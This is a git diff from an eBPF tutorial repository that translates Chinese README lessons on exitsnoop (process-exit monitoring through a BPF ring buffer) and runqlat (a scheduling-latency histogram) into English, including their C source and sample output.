demonstrates how to monitor process exit events using exitsnoop and print output to user space using a ring buffer: -1. 首先,我们引入所需的头文件和 exitsnoop.h。 -2. 定义一个名为 "LICENSE" 的全局变量,内容为 "Dual BSD/GPL",这是 eBPF 程序的许可证要求。 -3. 定义一个名为 rb 的 BPF_MAP_TYPE_RINGBUF 类型的映射,它将用于将内核空间的数据传输到用户空间。指定 max_entries 为 256 * 1024,代表 ring buffer 的最大容量。 -4. 定义一个名为 handle_exit 的 eBPF 程序,它将在进程退出事件触发时执行。传入一个名为 ctx 的 trace_event_raw_sched_process_template 结构体指针作为参数。 -5. 使用 bpf_get_current_pid_tgid() 函数获取当前任务的 PID 和 TID。对于主线程,PID 和 TID 相同;对于子线程,它们是不同的。我们只关心进程(主线程)的退出,因此在 PID 和 TID 不同时返回 0,忽略子线程退出事件。 -6. 使用 bpf_ringbuf_reserve 函数为事件结构体 e 在 ring buffer 中预留空间。如果预留失败,返回 0。 -7. 使用 bpf_get_current_task() 函数获取当前任务的 task_struct 结构指针。 -8. 将进程相关信息填充到预留的事件结构体 e 中,包括进程持续时间、PID、PPID、退出代码以及进程名称。 -9. 最后,使用 bpf_ringbuf_submit 函数将填充好的事件结构体 e 提交到 ring buffer,之后在用户空间进行处理和输出。 +1. First, we include the required headers and exitsnoop.h. +2. We define a global variable named "LICENSE" with the content "Dual BSD/GPL", which is the license requirement for eBPF programs. +3. We define a mapping named rb of type BPF_MAP_TYPE_RINGBUF, which will be used to transfer data from kernel space to user space. We specify max_entries as 256 * 1024, representing the maximum capacity of the ring buffer. +4. We define an eBPF program named handle_exit, which will be executed when a process exit event is triggered. It takes a trace_event_raw_sched_process_template struct pointer named ctx as the parameter. +5. We use the bpf_get_current_pid_tgid() function to obtain the PID and TID of the current task. For the main thread, the PID and TID are the same; for child threads, they are different. Since we only care about the exit of the process (main thread), we return 0 if the PID and TID are different, ignoring the exit events of child threads. +6. We use the bpf_ringbuf_reserve function to reserve space for the event struct e in the ring buffer. If the reservation fails, we return 0. +7. We use the bpf_get_current_task() function to obtain a task_struct structure pointer for the current task. +8. We fill in the process-related information into the reserved event struct e, including the duration of the process, PID, PPID, exit code, and process name. +9. Finally, we use the bpf_ringbuf_submit function to submit the filled event struct e to the ring buffer, for further processing and output in user space. 
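+A quick aside on the `exit_code` read in step 8: the kernel stores it in the packed wait-status format, with the normal exit status in bits 8-15 and the terminating signal in the low byte, which is why the program extracts it as `(exit_code >> 8) & 0xff`. A minimal user-space sketch of the same packing, using the standard wait macros:
+
+```c
+// The kernel's task->exit_code uses the wait(2) status layout:
+// (exit status << 8) | terminating signal.
+#include <stdio.h>
+#include <sys/wait.h>
+
+int main(void)
+{
+    unsigned int status = (42 << 8) | 0;   /* exit(42), not signaled */
+
+    printf("manual decode: %u\n", (status >> 8) & 0xff); /* 42 */
+    printf("WEXITSTATUS(): %u\n", WEXITSTATUS(status));  /* 42 */
+    return 0;
+}
+```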
-这个示例展示了如何使用 exitsnoop 和 ring buffer 在 eBPF 程序中捕获进程退出事件并将相关信息传输到用户空间。这对于分析进程退出原因和监控系统行为非常有用。 +This example demonstrates how to capture process exit events using exitsnoop and a ring buffer in an eBPF program, and transfer relevant information to user space. This is useful for analyzing process exit reasons and monitoring system behavior. ## Compile and Run -eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 +eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that combines with Wasm. Its purpose is to simplify the development, build, distribution, and execution of eBPF programs. You can refer to to download and install the ecc compiler toolchain and ecli runtime. We will use eunomia-bpf to compile and run this example. Compile: @@ -143,7 +143,7 @@ Run: ```console $ sudo ./ecli run package.json -TIME PID PPID EXIT_CODE DURATION_NS COMM +TIME PID PPID EXIT_CODE DURATION_NS COMM 21:40:09 42050 42049 0 0 which 21:40:09 42049 3517 0 0 sh 21:40:09 42052 42051 0 0 ps @@ -155,8 +155,8 @@ TIME PID PPID EXIT_CODE DURATION_NS COMM 21:40:09 42059 42054 0 0 cat ``` -## 总结 +## Summary -本文介绍了如何使用 eunomia-bpf 开发一个简单的 BPF 程序,该程序可以监控 Linux 系统中的进程退出事件, 并将捕获的事件通过 ring buffer 发送给用户空间程序。在本文中,我们使用 eunomia-bpf 编译运行了这个例子。 +This article introduces how to develop a simple BPF program using eunomia-bpf that can monitor process exit events in a Linux system and send the captured events to user space programs via a ring buffer. In this article, we compiled and ran this example using eunomia-bpf. -为了更好地理解和实践 eBPF 编程,我们建议您阅读 eunomia-bpf 的官方文档: 。此外,我们还为您提供了完整的教程和源代码,您可以在 中查看和学习。希望本教程能够帮助您顺利入门 eBPF 开发,并为您的进一步学习和实践提供有益的参考。 +To better understand and practice eBPF programming, we recommend reading the official documentation of eunomia-bpf at: . Additionally, we provide a complete tutorial and source code for you to view and learn from at . We hope this tutorial helps you get started with eBPF development and provides useful references for your further learning and practice.
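+For reference, a standalone libbpf consumer of the `rb` ring buffer map might look like the following sketch. As with the perf buffer example in the previous part, the skeleton header `exitsnoop.skel.h` and the `exitsnoop_bpf__*` functions are assumptions (a bpftool-generated skeleton), not part of the eunomia-bpf build used above.
+
+```c
+// Hypothetical libbpf reader: ring_buffer__poll() invokes handle_event
+// once per bpf_ringbuf_submit()ed sample; unlike perf_buffer__new(),
+// no per-CPU page count is needed.
+#include <stdio.h>
+#include <bpf/libbpf.h>
+#include "exitsnoop.h"
+#include "exitsnoop.skel.h"
+
+static int handle_event(void *ctx, void *data, size_t size)
+{
+    const struct event *e = data;
+    printf("%-16s pid=%d ppid=%d exit_code=%u dur_ns=%llu\n",
+           e->comm, e->pid, e->ppid, e->exit_code, e->duration_ns);
+    return 0;  /* a negative return would abort the poll */
+}
+
+int main(void)
+{
+    struct exitsnoop_bpf *skel = exitsnoop_bpf__open_and_load();
+    if (!skel)
+        return 1;
+    if (exitsnoop_bpf__attach(skel))
+        goto cleanup;
+
+    struct ring_buffer *rb = ring_buffer__new(bpf_map__fd(skel->maps.rb),
+                                              handle_event, NULL, NULL);
+    if (rb)
+        while (ring_buffer__poll(rb, 100 /* ms */) >= 0)
+            ;
+    ring_buffer__free(rb);
+cleanup:
+    exitsnoop_bpf__destroy(skel);
+    return 0;
+}
+```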
diff --git a/src/8-exitsnoop/README.zh.md b/src/8-exitsnoop/README.zh.md new file mode 100644 index 0000000..fbb30a8 --- /dev/null +++ b/src/8-exitsnoop/README.zh.md @@ -0,0 +1,162 @@ +# eBPF 入门开发实践教程八:在 eBPF 中使用 exitsnoop 监控进程退出事件,使用 ring buffer 向用户态打印输出 + +eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 + +本文是 eBPF 入门开发实践教程的第八篇,在 eBPF 中使用 exitsnoop 监控进程退出事件。 + +## ring buffer + +现在有一个新的 BPF 数据结构可用,eBPF 环形缓冲区(ring buffer)。它解决了 BPF perf buffer(当今从内核向用户空间发送数据的事实上的标准)的内存效率和事件重排问题,同时达到或超过了它的性能。它既提供了与 perf buffer 兼容以方便迁移,又有新的保留/提交API,具有更好的可用性。另外,合成和真实世界的基准测试表明,在几乎所有的情况下,所以考虑将其作为从BPF程序向用户空间发送数据的默认选择。 + +### eBPF ringbuf vs eBPF perfbuf + +只要 BPF 程序需要将收集到的数据发送到用户空间进行后处理和记录,它通常会使用 BPF perf buffer(perfbuf)来实现。Perfbuf 是每个CPU循环缓冲区的集合,它允许在内核和用户空间之间有效地交换数据。它在实践中效果很好,但由于其按CPU设计,它有两个主要的缺点,在实践中被证明是不方便的:内存的低效使用和事件的重新排序。 + +为了解决这些问题,从Linux 5.8开始,BPF提供了一个新的BPF数据结构(BPF map)。BPF环形缓冲区(ringbuf)。它是一个多生产者、单消费者(MPSC)队列,可以同时在多个CPU上安全共享。 + +BPF ringbuf 支持来自 BPF perfbuf 的熟悉的功能: + +- 变长的数据记录。 +- 能够通过内存映射区域有效地从用户空间读取数据,而不需要额外的内存拷贝和/或进入内核的系统调用。 +- 既支持epoll通知,又能以绝对最小的延迟进行忙环操作。 + +同时,BPF ringbuf解决了BPF perfbuf的以下问题: + +- 内存开销。 +- 数据排序。 +- 浪费的工作和额外的数据复制。 + +## exitsnoop + +本文是 eBPF 入门开发实践教程的第八篇,在 eBPF 中使用 exitsnoop 监控进程退出事件,并使用 ring buffer 向用户态打印输出。 + +使用 ring buffer 向用户态打印输出的步骤和 perf buffer 类似,首先需要定义一个头文件: + +头文件:exitsnoop.h + +```c +#ifndef __BOOTSTRAP_H +#define __BOOTSTRAP_H + +#define TASK_COMM_LEN 16 +#define MAX_FILENAME_LEN 127 + +struct event { + int pid; + int ppid; + unsigned exit_code; + unsigned long long duration_ns; + char comm[TASK_COMM_LEN]; +}; + +#endif /* __BOOTSTRAP_H */ +``` + +源文件:exitsnoop.bpf.c + +```c +#include "vmlinux.h" +#include +#include +#include +#include "exitsnoop.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +SEC("tp/sched/sched_process_exit") +int handle_exit(struct trace_event_raw_sched_process_template* ctx) +{ + struct task_struct *task; + struct event *e; + pid_t pid, tid; + u64 id, ts, *start_ts, start_time = 0; + + /* get PID and TID of exiting thread/process */ + id = bpf_get_current_pid_tgid(); + pid = id >> 32; + tid = (u32)id; + + /* ignore thread exits */ + if (pid != tid) + return 0; + + /* reserve sample from BPF ringbuf */ + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (!e) + return 0; + + /* fill out the sample with data */ + task = (struct task_struct *)bpf_get_current_task(); + start_time = BPF_CORE_READ(task, start_time); + + e->duration_ns = bpf_ktime_get_ns() - start_time; + e->pid = pid; + e->ppid = BPF_CORE_READ(task, real_parent, tgid); + e->exit_code = (BPF_CORE_READ(task, exit_code) >> 8) & 0xff; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + + /* send data to user-space for post-processing */ + bpf_ringbuf_submit(e, 0); + return 0; +} +``` + +这段代码展示了如何使用 exitsnoop 监控进程退出事件并使用 ring buffer 向用户态打印输出: + +1. 首先,我们引入所需的头文件和 exitsnoop.h。 +2. 定义一个名为 "LICENSE" 的全局变量,内容为 "Dual BSD/GPL",这是 eBPF 程序的许可证要求。 +3. 定义一个名为 rb 的 BPF_MAP_TYPE_RINGBUF 类型的映射,它将用于将内核空间的数据传输到用户空间。指定 max_entries 为 256 * 1024,代表 ring buffer 的最大容量。 +4. 定义一个名为 handle_exit 的 eBPF 程序,它将在进程退出事件触发时执行。传入一个名为 ctx 的 trace_event_raw_sched_process_template 结构体指针作为参数。 +5. 使用 bpf_get_current_pid_tgid() 函数获取当前任务的 PID 和 TID。对于主线程,PID 和 TID 相同;对于子线程,它们是不同的。我们只关心进程(主线程)的退出,因此在 PID 和 TID 不同时返回 0,忽略子线程退出事件。 +6. 使用 bpf_ringbuf_reserve 函数为事件结构体 e 在 ring buffer 中预留空间。如果预留失败,返回 0。 +7. 使用 bpf_get_current_task() 函数获取当前任务的 task_struct 结构指针。 +8. 
将进程相关信息填充到预留的事件结构体 e 中,包括进程持续时间、PID、PPID、退出代码以及进程名称。 +9. 最后,使用 bpf_ringbuf_submit 函数将填充好的事件结构体 e 提交到 ring buffer,之后在用户空间进行处理和输出。 + +这个示例展示了如何使用 exitsnoop 和 ring buffer 在 eBPF 程序中捕获进程退出事件并将相关信息传输到用户空间。这对于分析进程退出原因和监控系统行为非常有用。 + +## Compile and Run + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 + +Compile: + +```shell +docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest +``` + +Or + +```console +$ ecc exitsnoop.bpf.c exitsnoop.h +Compiling bpf object... +Generating export types... +Packing ebpf object and config into package.json... +``` + +Run: + +```console +$ sudo ./ecli run package.json +TIME PID PPID EXIT_CODE DURATION_NS COMM +21:40:09 42050 42049 0 0 which +21:40:09 42049 3517 0 0 sh +21:40:09 42052 42051 0 0 ps +21:40:09 42051 3517 0 0 sh +21:40:09 42055 42054 0 0 sed +21:40:09 42056 42054 0 0 cat +21:40:09 42057 42054 0 0 cat +21:40:09 42058 42054 0 0 cat +21:40:09 42059 42054 0 0 cat +``` + +## 总结 + +本文介绍了如何使用 eunomia-bpf 开发一个简单的 BPF 程序,该程序可以监控 Linux 系统中的进程退出事件, 并将捕获的事件通过 ring buffer 发送给用户空间程序。在本文中,我们使用 eunomia-bpf 编译运行了这个例子。 + +为了更好地理解和实践 eBPF 编程,我们建议您阅读 eunomia-bpf 的官方文档: 。此外,我们还为您提供了完整的教程和源代码,您可以在 中查看和学习。希望本教程能够帮助您顺利入门 eBPF 开发,并为您的进一步学习和实践提供有益的参考。 diff --git a/src/8-exitsnoop/README_en.md b/src/8-exitsnoop/README_en.md deleted file mode 100644 index 9983cbe..0000000 --- a/src/8-exitsnoop/README_en.md +++ /dev/null @@ -1,162 +0,0 @@ -# eBPF Tutorial by Example 8: Monitoring Process Exit Events, Output with Ring Buffer - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime in the kernel. - -This article is the eighth part of the eBPF Tutorial by Example, focusing on monitoring process exit events with eBPF. - -## Ring Buffer - -There is now a new BPF data structure available called the eBPF ring buffer. It solves the memory efficiency and event reordering issues of the BPF perf buffer, which is currently the de facto standard for sending data from the kernel to user space. It provides compatibility with perf buffer for easy migration while also introducing new reserved/commit APIs for improved usability. Additionally, synthetic and real-world benchmark tests have shown that in nearly all cases, the eBPF ring buffer should be the default choice for sending data from BPF programs to user space. - -### eBPF Ring Buffer vs eBPF Perf Buffer - -Whenever a BPF program needs to send collected data to user space for post-processing and logging, it typically uses the BPF perf buffer (perfbuf). Perfbuf is a collection of per-CPU circular buffers that allow efficient data exchange between the kernel and user space. It works well in practice, but it has two main drawbacks that have proven to be inconvenient: inefficient memory usage and event reordering. - -To address these issues, starting from Linux 5.8, BPF introduces a new BPF data structure called BPF ring buffer. It is a multiple producer, single consumer (MPSC) queue that can be safely shared across multiple CPUs. - -The BPF ring buffer supports familiar features from BPF perf buffer: - -- Variable-length data records. -- Efficient reading of data from user space through memory-mapped regions without additional memory copies and/or entering kernel system calls. -- Support for epoll notifications and busy loop operations with absolute minimal latency. 
- -At the same time, the BPF ring buffer solves the following problems of the BPF perf buffer: - -- Memory overhead. -- Data ordering. -- Unnecessary work and additional data copying. - -## exitsnoop - -This article is the eighth part of the eBPF Tutorial by Example, focusing on monitoring process exit events with eBPF and using the ring buffer to print output to user space. - -The steps for printing output to user space using the ring buffer are similar to perf buffer. First, a header file needs to be defined: - -Header File: exitsnoop.h - -```c -#ifndef __BOOTSTRAP_H -#define __BOOTSTRAP_H - -#define TASK_COMM_LEN 16 -#define MAX_FILENAME_LEN 127 - -struct event { - int pid; - int ppid; - unsigned exit_code; - unsigned long long duration_ns; - char comm[TASK_COMM_LEN]; -}; - -#endif /* __BOOTSTRAP_H */ -``` - -Source File: exitsnoop.bpf.c - -```c -#include "vmlinux.h" -#include -#include -#include -#include "exitsnoop.h" - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -struct { - __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 256 * 1024); -} rb SEC(".maps"); - -SEC("tp/sched/sched_process_exit") -int handle_exit(struct trace_event_raw_sched_process_template* ctx) -{ - struct task_struct *task; - struct event *e; - pid_t pid, tid; - u64 id, ts, *start_ts, start_time = 0; - - /* get PID and TID of exiting thread/process */ - id = bpf_get_current_pid_tgid(); - pid = id >> 32; - tid = (u32)id; - - /* ignore thread exits */ - if (pid != tid) - return 0; - - /* reserve sample from BPF ringbuf */ - e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); - if (!e) - return 0; - - /* fill out the sample with data */ - task = (struct task_struct *)bpf_get_current_task(); - start_time = BPF_CORE_READ(task, start_time); - - e->duration_ns = bpf_ktime_get_ns() - start_time; - e->pid = pid; - e->ppid = BPF_CORE_READ(task, real_parent, tgid); - e->exit_code = (BPF_CORE_READ(task, exit_code) >> 8) & 0xff; - bpf_get_current_comm(&e->comm, sizeof(e->comm)); - - /* send data to user-space for post-processing */ - bpf_ringbuf_submit(e, 0); - return 0; -} -``` - -This code demonstrates how to monitor process exit events using exitsnoop and print output to user space using a ring buffer: - -1. First, we include the required headers and exitsnoop.h. -2. We define a global variable named "LICENSE" with the content "Dual BSD/GPL", which is the license requirement for eBPF programs. -3. We define a mapping named rb of type BPF_MAP_TYPE_RINGBUF, which will be used to transfer data from kernel space to user space. We specify max_entries as 256 * 1024, representing the maximum capacity of the ring buffer. -4. We define an eBPF program named handle_exit, which will be executed when a process exit event is triggered. It takes a trace_event_raw_sched_process_template struct pointer named ctx as the parameter. -5. We use the bpf_get_current_pid_tgid() function to obtain the PID and TID of the current task. For the main thread, the PID and TID are the same; for child threads, they are different. Since we only care about the exit of the process (main thread), we return 0 if the PID and TID are different, ignoring the exit events of child threads. -6. We use the bpf_ringbuf_reserve function to reserve space for the event struct e in the ring buffer. If the reservation fails, we return 0. -7. We use the bpf_get_current_task() function to obtain a task_struct structure pointer for the current task. -8. 
We fill in the process-related information into the reserved event struct e, including the duration of the process, PID, PPID, exit code, and process name. -9. Finally, we use the bpf_ringbuf_submit function to submit the filled event struct e to the ring buffer, for further processing and output in user space. - -This example demonstrates how to capture process exit events using exitsnoop and a ring buffer in an eBPF program, and transfer relevant information to user space. This is useful for analyzing process exit reasons and monitoring system behavior. - -## Compile and Run - -eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that combines with Wasm. Its purpose is to simplify the development, build, distribution, and execution of eBPF programs. You can refer to to download and install the ecc compiler toolchain and ecli runtime. We will use eunomia-bpf to compile and run this example. - -Compile: - -```shell -docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest -``` - -Or - -```console -$ ecc exitsnoop.bpf.c exitsnoop.h -Compiling bpf object... -Generating export types... -Packing ebpf object and config into package.json... -``` - -Run: - -```console -$ sudo ./ecli run package.json -TIME PID PPID EXIT_CODE DURATION_NS COMM". -21:40:09 42050 42049 0 0 which -21:40:09 42049 3517 0 0 sh -21:40:09 42052 42051 0 0 ps -21:40:09 42051 3517 0 0 sh -21:40:09 42055 42054 0 0 sed -21:40:09 42056 42054 0 0 cat -21:40:09 42057 42054 0 0 cat -21:40:09 42058 42054 0 0 cat -21:40:09 42059 42054 0 0 cat -``` - -## Summary - -This article introduces how to develop a simple BPF program using eunomia-bpf that can monitor process exit events in a Linux system and send the captured events to user space programs via a ring buffer. In this article, we compiled and ran this example using eunomia-bpf. - -To better understand and practice eBPF programming, we recommend reading the official documentation of eunomia-bpf at: . Additionally, we provide a complete tutorial and source code for you to view and learn from at . We hope this tutorial helps you get started with eBPF development and provides useful references for your further learning and practice. diff --git a/src/9-runqlat/README.md b/src/9-runqlat/README.md index 812b1f7..ffd3377 100755 --- a/src/9-runqlat/README.md +++ b/src/9-runqlat/README.md @@ -1,32 +1,32 @@ -# eBPF 入门开发实践教程九:捕获进程调度延迟,以直方图方式记录 +# eBPF Tutorial by Example 9: Capturing Scheduling Latency and Recording as Histogram -eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime. -runqlat 是一个 eBPF 工具,用于分析 Linux 系统的调度性能。具体来说,runqlat 用于测量一个任务在被调度到 CPU 上运行之前在运行队列中等待的时间。这些信息对于识别性能瓶颈和提高 Linux 内核调度算法的整体效率非常有用。 +runqlat is an eBPF tool used for analyzing the scheduling performance of the Linux system. Specifically, runqlat is used to measure the time a task waits in the run queue before being scheduled to run on a CPU. This information is very useful for identifying performance bottlenecks and improving the overall efficiency of the Linux kernel scheduling algorithm. 
-## runqlat 原理 +## runqlat Principle -本教程是 eBPF 入门开发实践系列的第九部分,主题是 "捕获进程调度延迟"。在此,我们将介绍一个名为 runqlat 的程序,其作用是以直方图的形式记录进程调度延迟。 +This tutorial is the ninth part of the eBPF beginner's development series, with the topic "Capturing Process Scheduling Latency". Here, we will introduce a program called runqlat, which records process scheduling latency as a histogram. -Linux 操作系统使用进程来执行所有的系统和用户任务。这些进程可能被阻塞、杀死、运行,或者正在等待运行。处在后两种状态的进程数量决定了 CPU 运行队列的长度。 +The Linux operating system uses processes to execute all system and user tasks. These processes can be blocked, killed, running, or waiting to run. The number of processes in the latter two states determines the length of the CPU run queue. -进程有几种可能的状态,如: +Processes can have several possible states, such as: -- 可运行或正在运行 -- 可中断睡眠 -- 不可中断睡眠 -- 停止 -- 僵尸进程 +- Runnable or running +- Interruptible sleep +- Uninterruptible sleep +- Stopped +- Zombie process -等待资源或其他函数信号的进程会处在可中断或不可中断的睡眠状态:进程被置入睡眠状态,直到它需要的资源变得可用。然后,根据睡眠的类型,进程可以转移到可运行状态,或者保持睡眠。 +Processes waiting for resources or other function signals are in the interruptible or uninterruptible sleep state: the process is put to sleep until the resource it needs becomes available. Then, depending on the type of sleep, the process can transition to the runnable state or remain asleep. -即使进程拥有它需要的所有资源,它也不会立即开始运行。它会转移到可运行状态,与其他处在相同状态的进程一起排队。CPU可以在接下来的几秒钟或毫秒内执行这些进程。调度器为 CPU 排列进程,并决定下一个要执行的进程。 +Even when a process has all the resources it needs, it does not start running immediately. It transitions to the runnable state and is queued together with other processes in the same state. The CPU can execute these processes in the next few seconds or milliseconds. The scheduler arranges the processes for the CPU and determines the next process to run. -根据系统的硬件配置,这个可运行队列(称为 CPU 运行队列)的长度可以短也可以长。短的运行队列长度表示 CPU 没有被充分利用。另一方面,如果运行队列长,那么可能意味着 CPU 不够强大,无法执行所有的进程,或者 CPU 的核心数量不足。在理想的 CPU 利用率下,运行队列的长度将等于系统中的核心数量。 +Depending on the hardware configuration of the system, the length of this runnable queue (known as the CPU run queue) can be short or long. A short run queue length indicates that the CPU is not being fully utilized. On the other hand, if the run queue is long, it may mean that the CPU is not powerful enough to handle all the processes or that the number of CPU cores is insufficient. In an ideal CPU utilization, the length of the run queue will be equal to the number of cores in the system. -进程调度延迟,也被称为 "run queue latency",是衡量线程从变得可运行(例如,接收到中断,促使其处理更多工作)到实际在 CPU 上运行的时间。在 CPU 饱和的情况下,你可以想象线程必须等待其轮次。但在其他奇特的场景中,这也可能发生,而且在某些情况下,它可以通过调优减少,从而提高整个系统的性能。 +Process scheduling latency, also known as "run queue latency," is the time it takes for a thread to go from becoming runnable (e.g., receiving an interrupt that prompts it to do more work) to actually running on the CPU. In the case of CPU saturation, you can imagine that the thread has to wait for its turn. But in other peculiar scenarios, this can also happen, and in some cases, it can be reduced by tuning to improve the overall system performance. -我们将通过一个示例来阐述如何使用 runqlat 工具。这是一个负载非常重的系统: +We will illustrate how to use the runqlat tool through an example. This is a heavily loaded system: ```shell # runqlat @@ -44,24 +44,13 @@ Tracing run queue latency... Hit Ctrl-C to end. 
256 -> 511 : 3 | | 512 -> 1023 : 5 | | 1024 -> 2047 : 27 |* | - 2048 -> 4095 : 30 |* | - 4096 -> 8191 : 20 | | - 8192 -> 16383 : 29 |* | - 16384 -> 32767 : 809 |****************************************| - 32768 -> 65535 : 64 |*** | ``` -在这个输出中,我们看到了一个双模分布,一个模在0到15微秒之间,另一个模在16到65毫秒之间。这些模式在分布(它仅仅是 "count" 列的视觉表示)中显示为尖峰。例如,读取一行:在追踪过程中,809个事件落入了16384到32767微秒的范围(16到32毫秒)。 - -在后续的教程中,我们将深入探讨如何利用 eBPF 对此类指标进行深度跟踪和分析,以更好地理解和优化系统性能。同时,我们也将学习更多关于 Linux 内核调度器、中断处理和 CPU 饱 - -runqlat 的实现利用了 eBPF 程序,它通过内核跟踪点和函数探针来测量进程在运行队列中的时间。当进程被排队时,trace_enqueue 函数会在一个映射中记录时间戳。当进程被调度到 CPU 上运行时,handle_switch 函数会检索时间戳,并计算当前时间与排队时间之间的时间差。这个差值(或 delta)被用于更新进程的直方图,该直方图记录运行队列延迟的分布。该直方图可用于分析 Linux 内核的调度性能。 - -## runqlat 代码实现 +## runqlat Code Implementation ### runqlat.bpf.c -首先我们需要编写一个源代码文件 runqlat.bpf.c: +First, we need to write a source code file `runqlat.bpf.c`: ```c // SPDX-License-Identifier: GPL-2.0 @@ -111,84 +100,84 @@ struct { static int trace_enqueue(u32 tgid, u32 pid) { - u64 ts; +u64 ts; - if (!pid) +if (!pid) return 0; - if (targ_tgid && targ_tgid != tgid) +if (targ_tgid && targ_tgid != tgid) return 0; - ts = bpf_ktime_get_ns(); - bpf_map_update_elem(&start, &pid, &ts, BPF_ANY); - return 0; +ts = bpf_ktime_get_ns(); +bpf_map_update_elem(&start, &pid, &ts, BPF_ANY); +return 0; } static unsigned int pid_namespace(struct task_struct *task) { - struct pid *pid; - unsigned int level; - struct upid upid; - unsigned int inum; +struct pid *pid; +unsigned int level; +struct upid upid; +unsigned int inum; - /* get the pid namespace by following task_active_pid_ns(), - * pid->numbers[pid->level].ns - */ - pid = BPF_CORE_READ(task, thread_pid); - level = BPF_CORE_READ(pid, level); - bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]); - inum = BPF_CORE_READ(upid.ns, ns.inum); +/* get the pid namespace by following task_active_pid_ns(), + * pid->numbers[pid->level].ns + */ +pid = BPF_CORE_READ(task, thread_pid); +level = BPF_CORE_READ(pid, level); +bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]); +inum = BPF_CORE_READ(upid.ns, ns.inum); - return inum; +return inum; } static int handle_switch(bool preempt, struct task_struct *prev, struct task_struct *next) { - struct hist *histp; - u64 *tsp, slot; - u32 pid, hkey; - s64 delta; +struct hist *histp; +u64 *tsp, slot; +u32 pid, hkey; +s64 delta; - if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) +if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) return 0; - if (get_task_state(prev) == TASK_RUNNING) +if (get_task_state(prev) == TASK_RUNNING) trace_enqueue(BPF_CORE_READ(prev, tgid), BPF_CORE_READ(prev, pid)); - pid = BPF_CORE_READ(next, pid); +pid = BPF_CORE_READ(next, pid); - tsp = bpf_map_lookup_elem(&start, &pid); - if (!tsp) +tsp = bpf_map_lookup_elem(&start, &pid); +if (!tsp) return 0; - delta = bpf_ktime_get_ns() - *tsp; - if (delta < 0) +delta = bpf_ktime_get_ns() - *tsp; +if (delta < 0) goto cleanup; - if (targ_per_process) +if (targ_per_process) hkey = BPF_CORE_READ(next, tgid); - else if (targ_per_thread) +else if (targ_per_thread) hkey = pid; - else if (targ_per_pidns) +else if (targ_per_pidns) hkey = pid_namespace(next); - else +else hkey = -1; - histp = bpf_map_lookup_or_try_init(&hists, &hkey, &zero); - if (!histp) +histp = bpf_map_lookup_or_try_init(&hists, &hkey, &zero); +if (!histp) goto cleanup; - if (!histp->comm[0]) +if (!histp->comm[0]) bpf_probe_read_kernel_str(&histp->comm, sizeof(histp->comm), next->comm); - if (targ_ms) +if (targ_ms) delta /= 1000000U; - else +else delta /= 1000U; - slot = log2l(delta); - if 
(slot >= MAX_SLOTS) +slot = log2l(delta); +if (slot >= MAX_SLOTS) slot = MAX_SLOTS - 1; - __sync_fetch_and_add(&histp->slots[slot], 1); +__sync_fetch_and_add(&histp->slots[slot], 1); cleanup: - bpf_map_delete_elem(&start, &pid); - return 0; +bpf_map_delete_elem(&start, &pid); +return 0; } SEC("raw_tp/sched_wakeup") @@ -218,7 +207,9 @@ int BPF_PROG(handle_sched_switch, bool preempt, struct task_struct *prev, struct char LICENSE[] SEC("license") = "GPL"; ``` -这其中定义了一些常量和全局变量,用于过滤对应的追踪目标: +#### Constants and Global Variables + +The code defines several constants and volatile global variables used for filtering corresponding tracing targets. These variables include: ```c #define MAX_ENTRIES 10240 @@ -232,9 +223,13 @@ const volatile bool targ_ms = false; const volatile pid_t targ_tgid = 0; ``` -这些变量包括最大映射项数量、任务状态、过滤选项和目标选项。这些选项可以通过用户空间程序设置,以定制 eBPF 程序的行为。 +- `MAX_ENTRIES`: The maximum number of map entries. +- `TASK_RUNNING`: The task status value. +- `filter_cg`, `targ_per_process`, `targ_per_thread`, `targ_per_pidns`, `targ_ms`, `targ_tgid`: Boolean variables for filtering and target options. These options can be set by user-space programs to customize the behavior of the eBPF program. -接下来,定义了一些 eBPF 映射: +#### eBPF Maps + +The code defines several eBPF maps including: ```c struct { @@ -261,15 +256,15 @@ struct { } hists SEC(".maps"); ``` -这些映射包括: +- `cgroup_map`: A cgroup array map used for filtering cgroups. +- `start`: A hash map used to store timestamps when processes are enqueued. +- `hists`: A hash map used to store histogram data for recording process scheduling delays. -- cgroup_map 用于过滤 cgroup; -- start 用于存储进程入队时的时间戳; -- hists 用于存储直方图数据,记录进程调度延迟。 +#### Helper Functions -接下来是一些辅助函数: +The code includes two helper functions: -trace_enqueue 函数用于在进程入队时记录其时间戳: +- `trace_enqueue`: This function is used to record the timestamp when a process is enqueued. It takes the `tgid` and `pid` values as parameters. If the `pid` value is 0 or the `targ_tgid` value is not 0 and not equal to `tgid`, the function returns 0. Otherwise, it retrieves the current timestamp using `bpf_ktime_get_ns` and updates the `start` 